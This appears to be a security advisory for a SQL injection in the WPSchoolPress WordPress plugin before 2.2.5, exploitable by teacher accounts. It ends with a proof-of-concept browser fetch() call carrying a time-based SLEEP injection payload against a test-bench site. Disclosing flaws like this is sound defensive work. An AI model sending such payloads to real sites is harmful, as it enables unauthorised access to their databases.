WPSchoolPress < 2.2.5 - Teacher+ SQLi

Description The plugin uses the WordPress esc_sql() function on a field not delimited by quotes and did not first prepare the query, leading to a SQL injection exploitable by relatively low-privilege users like Teachers.

PoC

1. Install the WPSchoolpress plugin and Import Demo Data. 2. Log in as a teacher 3. Paste the following script in the browser’s console, and notice it hangs for a couple seconds, indicating the attack succeeded: await fetch("http://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin.php?page=sch-student", { "credentials": "include", "headers": { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1" }, "referrer": "http://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin.php?page=sch-student", "body": "ClassID=ClassID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))abc)", "method": "POST", "mode": "cors" });